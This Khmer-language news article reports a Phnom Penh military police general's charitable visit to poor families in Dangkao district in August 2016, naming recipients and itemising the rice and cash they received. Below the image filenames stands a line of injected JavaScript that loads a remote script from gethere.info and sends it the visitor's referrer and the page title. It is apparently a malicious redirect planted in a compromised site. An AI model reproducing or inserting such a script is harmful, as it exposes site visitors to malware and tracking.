ឯកឧត្តម ឧត្តមសេនីយ៍ឯក រ័ត្ន ស្រ៊ាង តែងតែយកចិត្តទុកដាក់ លើកិច្ចការងារមនុស្សធម៌

image

ភ្នំពេញ៖ វប្បធម៌ចែករំលែក ឥតឈប់ឈរ តាំងពីនៅខេត្តបន្ទាយមានជ័យ ដែលឯកឧត្តម ឧត្តមសេនីយ៍ឯក រ័ត្ន ស្រ៊ាង មេបញ្ជាការរងកងរាជអាវុធហត្ថលើផ្ទៃប្រទេសនិងជាមេបញ្ជាការកងរាជអាវុធហត្ថរាជធានីភ្នំពេញ បានចែករំលែកធនធានផ្ទាល់ខ្លួន ក៏ដូចជាគៀងគរសប្បុរស ជន ជួយឧបត្ថម្ភជីវភាពប្រចាំខែ ជូនដល់គ្រួសារចាស់ជរាគ្មានទីពឹងនិងគ្រួសារទីទាល់ក្រ4គ្រួសារ ក្នុងខេត្តបន្ទាយមានជ័យ។ បន្ទាប់ពីឯកឧត្តម បានផ្លាស់មកកាន់តំណែងជាមេបញ្ជាការកងរាជអាវុធហត្ថរាជធានីភ្នំពេញ ក្នុងឆ្នាំ 2013 ឯកឧត្តមបានជួយឧបត្ថម្ភជីវភាពប្រចាំខែ ដល់គ្រួសារស្ត្រីមេម៉ាយនិងមានជម្ងឺប្រចាំកាយ ផ្សេងមួយទៀតក្នុងខណ្ឌព្រែកព្នៅរាជធានីភ្នំពេញដែលជួបការលំបាកក្នុងការតស៊ូប្រឹងប្រែងចិញ្ចឹមកូនៗ។

នៅព្រឹកថ្ងៃទី 27.08.2016 ឆ្លៀតពេលចុងសប្តាហ៍ ឯកឧត្តម ឧត្តមសេនីយ៍ឯក រ័ត្ន ស្រ៊ាង បានដឹកនាំសហការីនៃ កងរាជអាវុធហត្ថរាជធានីភ្នំពេញ អមដំណើរដោយលោក ជ គឹមស៊ អភិបាលរងខណ្ឌដង្កោ លោកចៅសង្កាត់រង លោកមេភូមិ យុវជនសង្កាត់ បានចុះសាកសួរសុខទុក្ខ និងនាំយកនូវអំណោយជូនដល់គ្រួសារប្រជាពលរដ្ឋទីទ័លក្រគ្មានទីពឹង ចំនួន 06 គ្រួសារ ក្នុងខណ្ឌដង្កោ រាជធានីភ្នំពេញ និងបានសន្យា ជួយឧបត្ថម្ភជីវភាពជាប្រចាំរៀងរាល់ ខែ ចំនួន04គ្រួសារបន្ថែមទៀតផងដែរក្នុងនោះមាន
1- គ្រួសារលោកយាយ ពុំ សុផល អាយុ60ឆ្នាំ មានចៅក្នុងបន្ទុក07នាក់
2- គ្រួសារលោកយាយ ខាន់ សួន អាយុ69ឆ្នាំមានចៅក្នុងបន្ទុកចំនួន 10នាក់
3- លោកយាយ ប្រាជ្ញ ចែម អាយុ59ឆ្នាំ(មានជម្ងឺ រស់នៅម្នាក់ឯង)
4- គ្រួសារអ៊ុំស្រី ឡង់ ស៊ីនួន អាយុ45ឆ្នាំ (ជាស្រ្តីមេម៉ាយកូនច្រើន) ដោយមួយគ្រួសារទទួលបានអង្ករ 02ការ៉ុង ទឹកស៊ីអ៊ីវ ទឹកត្រី04យួរ ,ត្រីខ02 យួរ ,ទឹកសុទ្ធ02 កេស ,ទឹកក្រូច01 កេស ,ថវិកា20 ម៉ឺនរៀល បន្ថែមពីលើនេះទៀតចំពោះគ្រួសារលោកយាយ ពុំ សុផល និងលោកយាយ ខាន់សួន ដែលមានចៅក្នុងបន្ទុកច្រើនទទួលបានអង្ករប្រចាំ ខែក្នុងមួយគ្រួសារ 03 ការ៉ុង ហើយឯកឧត្តមបានធានាជួសជុលផ្ទះឲ្យបានសមរម្យឡើងវិញជូនដល់03គ្រួសារផង ដែរ គឺគ្រួសារលោកយាយ ពុំ សុផល,លោកយាយ ខាន់ សួន និងអ៊ុំស្រី ឡង់ ស៊ីនួន)
ដោយឡែក 02គ្រួសារទៀតដែលបានទទួលអំណោយក្នុងពេលនោះដែរនោះមាន
1-គ្រួសារលោកយាយ ម៉ៅ អឿង អាយុ70ឆ្នាំ និង2-គ្រួសារលោកតា ស ផន អាយុ77ឆ្នាំ ដោយក្នុងមួយគ្រួសារទទួលបាន អង្ករ02 ការ៉ុង ទឹកស៊ីអ៊ីវ ទឹកត្រី 04យួរ ត្រីខ02 យួរ ទឹកសុទ្ធ02 កេស ទឹកក្រូច01 កេស ថវិកា20 ម៉ឺនរៀល។

សរុបទាំងនៅខេត្តបន្ទាយមានជ័យនិងរាជធានីភ្នំពេញ បច្ចុប្បន្នឯកឧត្តម ឧត្តមសេនីយ៍ឯក រ័ត្ន ស្រ៊ាង ទទួល ជួយឧបត្ថម្ភជីវភាពប្រចាំខែ ជូនដល់គ្រួសារទីទាល់ក្រ និងចាស់ជរាគ្មានទីពឹង ចំនួន09គ្រួសារហើយ។
ក្នុងឱកាសនោះផងដែរ ឯកឧត្តម រ័ត្ន ស្រ៊ាង ក៏បានជួបប្រាស្រ័យ សំណេះសំណាលជាមួយប្រជាពលរដ្ឋតាមផ្ទះ ផ្សេងទៀតរួមមាន៖
1- ជួបសួរសុខទុក្ខអតីតៈមេភូមិឈ្មោះ ស្រី ចេង និងជួយឧបត្ថម្ភថវិកា20ម៉ឺនរៀល ។
2- ជួបសួរសុខទុក្ខស្រ្តីចំណាស់ម្នាក់ពិការភ្នែក និងជួយឧបត្ថម្ភ ថវិកា20ម៉ឺនរៀល ។
3- ចូលរួមក្នុងពិធីបុណ្យសពឈ្មោះ កាំង ស្រ៊ុន ភេទប្រុស ក្នុងភូមិព្រែកកំពឹស ដោយនាំយកថវិកាចួលរួមក្នុងបុណ្យ សព ចំនួន80ម៉ឺនរៀល(ក្នុងនោះថវិការបស់ឯកឧត្តមផ្ទាល់40ម៉ឺនរៀល និងក្រុមការងាររួមគ្នាចំនួន40ម៉ឺនរៀល) និង អង្ករ 02ការ៉ុង ,ទឹកសុទ្ធ 02កេស និងទឹកត្រីទឹកស៊ីអ៊ីវ 02យួរ ។
4- ជួយដោះស្រាយសងថវិកាសមាគមមនុស្សចាស់ដែលជំពាក់ នៅមិនទាន់បានដោះស្រាយសងជូនដល់គ្រួសារសពជាសមាជិកសមាគមមនុស្សចាស់ចំនួន 03គ្រួសារ (ក្នុង01សព 40ម៉ឺនរៀល) សរុប1លាន2សែនរៀល ។ ព្រមទាំងបានចែកនំបុ័ង និងថវិកា ជូនដល់មនុស្សចាស់ក្នុងភូមិម្នាក់ៗទទួលបាននំបុ័ង1ដើម ថវិកា1ម៉ឺនរៀល កុមារតូចៗក្នុងម្នាក់ៗទទួលបាននំបុ័ង1ដើម ថវិកា5000រៀល ។
និងចុងក្រោយ ឧបត្ថម្ភដល់កម្លាំង អាវុធហត្ថខណ្ឌដង្កោ  នគរបាលប៉ុស្តិ៍ ប្រជាការពារ ក្នុងមួយអង្គភាព 20 ម៉ឺន រៀល និងយុវជនសង្កាត់ម្នាក់1ម៉ឺនរៀលផងដែរ។

14051576_616213348553498_8001485887435699117_n 14055101_616213848553448_7172653076090686655_n 14063758_616213651886801_3360357386600100382_n 14063975_616213288553504_431452414395858651_n 14067460_616213261886840_1432114672820448800_n 14080019_616213238553509_2877064126405894668_n 14102549_616213241886842_3826175522020342241_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More